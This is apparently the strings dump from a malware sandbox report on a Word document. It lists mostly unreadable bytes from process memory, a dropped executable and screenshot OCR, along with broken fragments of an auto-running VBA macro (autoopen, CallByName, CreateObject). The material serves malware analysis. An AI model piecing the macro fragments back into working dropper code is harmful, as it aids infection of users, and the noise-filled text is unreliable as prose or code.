Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVLeafFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVLeafFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOS_HEAP@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOverlapFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOverlapFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVROCKALL_FRONT_END@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVTableFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

._.__-_-._._..

Ansi based on Image Processing (screen_4.png)

.`M%WINDIR%\SysWOW64\FM20.DLLMSForms

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.`ME{ThisDocumentGT@isDDjcueTn@2Q`H1x0-",~*""+Godule1GGo{u{12@3, !Ar0*U@ 8erfWa2C/-h*

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.De`scrip#Critical ERRORRe@sume N@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.idata

Ansi based on Dropped File (g545[1].exe.177218)

.iil._'0'i'il__.

Ansi based on Image Processing (screen_1.png)

.n.__ar

Ansi based on Image Processing (screen_0.png)

.rsrc

Ansi based on Dropped File (g545[1].exe.177218)

.text

Ansi based on Dropped File (g545[1].exe.177218)

/n /dde

Ansi based on Process Commandline (WINWORD.EXE)

/SOURCE 1 /LCID 1031 /WAITPID 2676

Ansi based on Process Commandline (OffDiag.exe)

0$6\7

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

0*i2KT``4KT`6`8`:`<+D@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

00"00000000001111 1(10181@1X1`1h1p1111111111111112222 20282@2H2P2X2`2h2p2x222222222222222333 3(303@3H3P3X3`3h3p3x33333333333333334640H4x4$4"4

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0046}#2.0#0#%WINDIR%\SysWOW64\e2.tlb#OLE Automation`ENormalENCrmaQF *\C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

00________,0

Ansi based on Image Processing (screen_1.png)

0__,__,

Ansi based on Image Processing (screen_4.png)

0__=?9_0,

Ansi based on Image Processing (screen_7.png)

0___'__0e_

Ansi based on Image Processing (screen_6.png)

0____

Ansi based on Image Processing (screen_1.png)

0_____0

Ansi based on Image Processing (screen_0.png)

0C?____?_,0

Ansi based on Image Processing (screen_2.png)

0ClaveTHETA_CK0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0P0RmvJ=qbuGJ>Mn!`jEh

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0UserForm1XrU@$`n@LG{h

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

1314}e01B6eFIN,> k/r/pzsn|el!lR"!veSF!_%: #0F.(3eLFIUov9(5Oe2GsSveC<7Bbo/}]:C//:;Z$7C!4&4sCNrIo:ve29@210oeCEN TRAR_0Centrar_cP O9PERDYxGANh8f!veF7F!@q6a///kCPP////P/[\jX#PP#011/"2_:QCHRNFCPRBGo8E'' Pe/aN_kCoordRU:?TR4GIM4U`A4GiA5uAI.FU(?vBe08NSF_PT0ransMPTECmpt;FORMATO,ama_PrefCONCAMBIOS*sQ6c'XG"9rSPACTEXP, sPNI.FU(9),10)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

1=vf

Ansi based on Runtime Data (perdoma.exe )

1\1e1|1

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

1bi.F. 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

2 2$2(2,2024282<2@2D2

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

28_zo

Ansi based on Dropped File (g545[1].exe.177218)

2KT 6 % 4KT 6 n,p 8KT : n,p <KT > n,p @KT B n,pn

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

3)`Ihc> VheAbAaYTruD8- 1wX.oc1S77 \w8].TAISAbSe|1!reateObj(mandata`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

354W4

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4 %':k+ 4 % > 4 %'>kP+ 8k8+n0+ $N VB+|+8+"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8*ox*

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

4 4(4

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

40+,,41221(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

4444414122(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

4444422211(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

4444422222(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

445&5@5H5(X555$555(56606H6P6,`6662666*707*87h7p7x7777777,8886X868,889909H9X9p99999: :8:@:X:p:::.:.:$;.0;`;;;;;;;;.<.8<h<<<<<== =8=H=`=$p===$==.>0>P>X>.h>>>>>>>

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

4518.1014

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4K5]5c5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4X5\5`5d5h5l5p5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5 2AVbMethod, i@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5 5$5(5,5054585<5@5D5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5 5(50585@5H5P5X5,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5(6,6064686<6@6D6H6L6P6T6X6\6`6d6

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5B A?8A:0 "&$0{vhM<UV.

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5Q384 e(14FSONDAi5spsPsbsSsPPs+T0&sJs1%skHnHCHsEs#E5CHRNFh+1+;If %<> "" ThenH6liqmIfPRBh

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5TahomaComboBox1im

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

6 % n,p n%p % n,p DKT 6 % n,p n%p % n,p 6 % n,p n%p % n,p FKT 6 % n,p n%p % n,p HKT 6 % n,p n%p % n,p 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

6,606L6P6l6p6

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

6.3.7603.16385

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

6>AF

Ansi based on Runtime Data (perdoma.exe )

7 7,787

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

7`8v?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

7K:!;?={=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

8$/8/FACTEXP9009010

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

85LROU1.9B7t.ras(C"0" TDcw%ElRoAn!<=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8DHDXDpDDDDDDDDE(E8EPE`ExEEEEEEE,F0F6PF6F,FFGG(G@GPGhGxGGGGGH0H8HPHhHxHH.H.H$I.(IXIxIIIIIII.J.0J`JJJJJJKK0K@KXK$hKKK$KK.K(LHLPL.`LLLLLLL LLMMxMMM"MMM$MMM

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8kCPTHETA_CECN^-I-usDf d8L PHI9P910ZCENTRARbB";I211A,8NOUnc+=Els!cGray)@perd2:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8PHP`PxPPPPPPPPPPPQQ(Q@QPQhQxQQQQQQQQQRRRR0RHRPRXR`RhRRRRRRR"RRRRRRRRSSS S

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

9 9$9(9,9094989<9@9D9H9L9P9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9$909<9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9ap0F%WINDIR%\SysWOW64\stdole2.tlbstdole

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

9h>p>x>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

:#;7;B;M;

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

; ;$;(;,;0;4;8;<;

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

; ;8;"<J<

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

;='_-_'__'t-_-.t-_-.

Ansi based on Image Processing (screen_4.png)

;Y<,=

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

<$<R<

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<*<b==?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<,<W<

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<9=B=M=U=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<:>u?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<<Se han ignorado algunas entradas, compruebe la configuraci?n Z \AVISO PROCESADO DE DATOS$X'8kP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

<B=F=J=N=R=V=Z=^=Q?s?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<S=O>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<W=$>i>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

= =$=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=$>*>C>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=)=j?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

==3=A=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=>@>}>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=L=n?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=L>p>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=q>p?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=V>k>7?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>!>?#?P?}?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>"$!)`bjbj.{{"""".FFFFFFFFeeeeee$hjFFFFFFFnnnF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>%*P

Ansi based on Runtime Data (perdoma.exe )

>1?A?Q?j?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>6?M?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

><>V>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>J

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>?"?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>??????"??????????@@@@ @(@0@8@@@X@`@h@p@@@@@@@@@@@@@@AAAA A(A0A8A@AHAPAXAhApAxAAAAAAAAAAAAAAAABBB B(B0B@BHBPBXB`BhBpBBBBBBBBBBBCCCC C0C8C@CHCPCXC`ChCpCxCCC*CC$C"D

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>\]FIIIIIIIIIIFQ`LLLLLL_TRRR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>]>c>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

>^>d>k>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>_]]QQQQQQRQRQQQ_``__STTRRRR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>fI@ntegerB`ufferCadenai Aux

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>G?m?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>S]]]]]]]]]]]]]]]]]]]]]]]]]...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>S]]a]aaa]]]]]]a```____R_R_U]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>t>"?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>|>W?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?0?4?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?0?4?8?<?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?(?0?8?@?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

?,?e?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

???__???s??___

Ansi based on Image Processing (screen_7.png)

?@?D?H?L?P?T?X?\?`?d?h?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.40F000.00000002.mdmp)

@%SystemRoot%\system32\dnsapi.dll,-103

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\System32\fveui.dll,-843

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\System32\fveui.dll,-844

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\system32\p2pcollab.dll,-8042

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\system32\qagentrt.dll,-10

Unicode based on Runtime Data (perdoma.exe )

@-= 0 ToAnsistidus.lstpcuencias.ListCoup- 1ep 1ReP0serve s1(i0?o

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@.data

Ansi based on Dropped File (g545[1].exe.177218)

@_R$BbROU&9;E"0" .TFCV ElroAh!A

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@srU~}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@|oc@F(F?oc(2T!NAz61y i` 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

[Host Extender Info]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

[Workspace]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

\A4MsgBox("No existe el fdz`st? da?" _& vbNewB]&j.Description,BvbOKOnly +`Critical, "ERROR PROCESADO DE DATOS"Resume !"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

]9pU(3CPXbFcO%2JAECTHPH%6RHL=%6pEMEM|$%tV4[

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_'^_JT

Ansi based on Image Processing (screen_4.png)

_,0__

Ansi based on Image Processing (screen_5.png)

_,__ar

Ansi based on Image Processing (screen_2.png)

_-----_l_l__''_:::''_:::''_:_l

Ansi based on Image Processing (screen_4.png)

_-=_-=

Ansi based on Image Processing (screen_2.png)

_..,..

Ansi based on Image Processing (screen_1.png)

_.0__

Ansi based on Image Processing (screen_1.png)

_.__-_-_--'--'-

Ansi based on Image Processing (screen_4.png)

_4Sen94p>3(u\mvm'PNI.FU(5) = SinLe.tras(s)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_8___

Ansi based on Image Processing (screen_5.png)

_?___

Ansi based on Image Processing (screen_7.png)

__-___-_

Ansi based on Image Processing (screen_1.png)

___---J

Ansi based on Image Processing (screen_7.png)

___-_-._._.

Ansi based on Image Processing (screen_1.png)

___-_-m_

Ansi based on Image Processing (screen_0.png)

___0_

Ansi based on Image Processing (screen_2.png)

_____

Ansi based on Image Processing (screen_0.png)

______

Ansi based on Image Processing (screen_0.png)

_______

Ansi based on Image Processing (screen_0.png)

__________:.__--,____

Ansi based on Image Processing (screen_1.png)

__________:.__--____._

Ansi based on Image Processing (screen_4.png)

_______g

Ansi based on Image Processing (screen_5.png)

_______J

Ansi based on Image Processing (screen_2.png)

_______Suchin'

Ansi based on Image Processing (screen_4.png)

______g

Ansi based on Image Processing (screen_3.png)

______i____

Ansi based on Image Processing (screen_1.png)

___L_

Ansi based on Image Processing (screen_0.png)

_A_ll-_--_-----

Ansi based on Image Processing (screen_4.png)

_aBbCcl

Ansi based on Image Processing (screen_0.png)

_chkstk

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

_EgQ+7l2so= h1l o h1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_Farm,,ahd,a,r,la.9'n

Ansi based on Image Processing (screen_2.png)

_i'ii__

Ansi based on Image Processing (screen_5.png)

_i'ii__r

Ansi based on Image Processing (screen_6.png)

_L___

Ansi based on Image Processing (screen_2.png)

_m,,k,,,,,.

Ansi based on Image Processing (screen_0.png)

_smop

Ansi based on Image Processing (screen_2.png)

_such'n_

Ansi based on Image Processing (screen_0.png)

_uC O#s.TDd(7!/GVSONDA_1&= Prefw22q3q4q5q"A_$F'F%qT.1567u#a0A_q<A_A__-"CTx(11wf|GA4IsPUn`e~]NOP9PN.I0 FONo2SINCAMBIQL(CO3[t943;CPXYBS%FAEHPHTH#6RHL=%6EMEM|$_

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

`.rdata

Ansi based on Dropped File (g545[1].exe.177218)

`7$`'`7`FIN_SFbkINI_CN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

a'ndirn

Ansi based on Image Processing (screen_1.png)

A,aIf "S") ThDen:dchk-o@.Valueah`ecked2JEnd IfeABeFIN5_@F!Else Fallo1@TruASelect`Loop Until EOF(flo_@iMsgBox("Se han ignorado algunas endas, comp@be lanfigur`+?n", _vbOKOnly + vbInf ormat@/, "AVISO P ROCES DE DAT#S@rCarga@rProc:@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

A_BbCc_

Ansi based on Image Processing (screen_0.png)

AaBbCcI

Ansi based on Image Processing (screen_0.png)

Ab_a_

Ansi based on Image Processing (screen_0.png)

agnostics

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

Ai`F;%PROGRAMFILES%\(x86)\Microsoft Office\OFFICE11\MSWORD.OLBWord

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Anc_cht

Ansi based on Image Processing (screen_0.png)

Ancicht

Ansi based on Image Processing (screen_4.png)

Ancicht_

Ansi based on Image Processing (screen_1.png)

and,rn'

Ansi based on Image Processing (screen_0.png)

APs St gDim i IPgeri

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Asteriscos &ClaveDAMAn%cNOFREC@a ix(Val"(`oLe.s(Iz.!)MI> he%Tru+cJ[

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Asteriscosy0ClaveDAMA0:0ClaveNOFRECEo0Val0SinLe0tras0ExtraeDatoIz0qda0sPro 0c1\0Izqda I0ClaveINI_NORMA40Checked00ClaveTEXCIT0PrefLINXs0ClaveLINX0PrefLINYs0ClaveLINY0PrefCIRC0ClaveCIRC0ClaveFIN_NORMA0ClaveINI_NORMACOMP0ClaveFIN_NORMACOMP0ClaveINI_SNIFTD20ClaveINI_EXPAND0ClaveINSONDA0ExtraeDat0oIzqda:0PrefSONDA_10ClaveFrecMax=0sLimFrecMinc0sFrecMin>0sLimFrecMaxb0SalirCargarProcesado0GuardarNORMAS0FichTmpr0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ation

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

ation, "AVISO PROCESADO DE rD DS"SalirCargarp Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

AutoDetect

Unicode based on Runtime Data (perdoma.exe )

b$=tfE

Ansi based on Runtime Data (perdoma.exe )

B'arb'_t'n

Ansi based on Image Processing (screen_2.png)

b(=!s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

B,arb,_t,n

Ansi based on Image Processing (screen_0.png)

B> #@PrefCONCAMBIOSs %6#M"CSIFACTEX\"$f F`R <Close .perd9:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bas0{4A691620-ADED-4625-B68A-5F1266CFD7FA}{D820E972-EA97-4D95-A1D2-6BA6E67E2007}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bas1Normal.VGlobal!SpaclFalseCreatablPre declaIdTru

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BaseClass=UserForm1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BE`xpose0TemplateDerivCus tomizDQ0*pHdProjectQ(@=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BExposeTemplateDeriv$CustomizC1Sub autoopen()

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bgarbgitgn

Ansi based on Image Processing (screen_1.png)

bHayCTruevP roc(8ECh eckedTH ETA_CCNZZs<oD.ch&8PHv+9X9+10V+@ENTRARXSelect BnPrefSI:11&LpANONUncKzElsCCGrayEnd &I2BB2nERDYGAN3

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayEXPAND;0bHaySFIFT`0bHayCNIFTo0bHayPNIFT0bHayPNIFU0bHayFrecs"&0perdH0sProcpJ0Uncheckedm0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayNORMAC0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHaySNIFTDy0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayTruesProc(7hecked

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Biarbiitin

Ansi based on Image Processing (screen_4.png)

c t0E_2, mata(11VbMethod,Z5, 2

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

C3boTExcitacion.Td s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

%COMMONPROGRAMFILES%\Microsoft Shared\office12;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Micros

Unicode based on Runtime Data (OffDiag.exe )

%TEMP%\C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Microsoft Office\Office12\

Unicode based on Runtime Data (perdoma.exe )

C]]]]]]]]]]]]]]]]]]]]]]]]]]...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

C_]a`a]]ac]a]a]a]a`a\a\a\ac...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

CadenaiAAux-lBooleaA= On Error GoTo Manipuxlar4$fI86lOpen ;FInpLutA#Do

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CallByName un

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CallByName0VbLetA0chkCPEF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Caption = "UserForm1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CAPU FrecsGo]pA*i0sProc) Step 1(i)Unch`eckedBxi0CharSinj3_.$_"I.&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CAPUFrecsGoTo perd4or i0 UBound(sa) St0ep 1(i)UncheckeNext

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CargarFichIncer "@"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CargarFichPr oc "/End

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Case ClaveTHETA_UL6rExjeDat.oIzqda(CadenavS

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Case PrefSONDA_1HsSNIFTD_E.XPAND(15) = ClaveHn2!n$73!7$End Sele4ct16oD.ch`FIN_o,hEs+NINI_SF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CharSinCargarQ0sSNIFTD_EXPAND0sSNIFTD_E0XPAND&0sSFIFT90sSFf0IFT0sCNIFTG0sCN0sPNIFT0sPN0sPNIFU0sPNIf0FUH]0ManipularErrorCargarProc(0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

chkFresnelo0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveCNIFT0chkCPPF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveIPOLD0SalirGuardarNORMA0Documentj0xS6020430-C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveLFI900ClaveGSonda0ClaveCSondaj0ClaveFIN_SFIFT0ClaveINI_CNIFT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

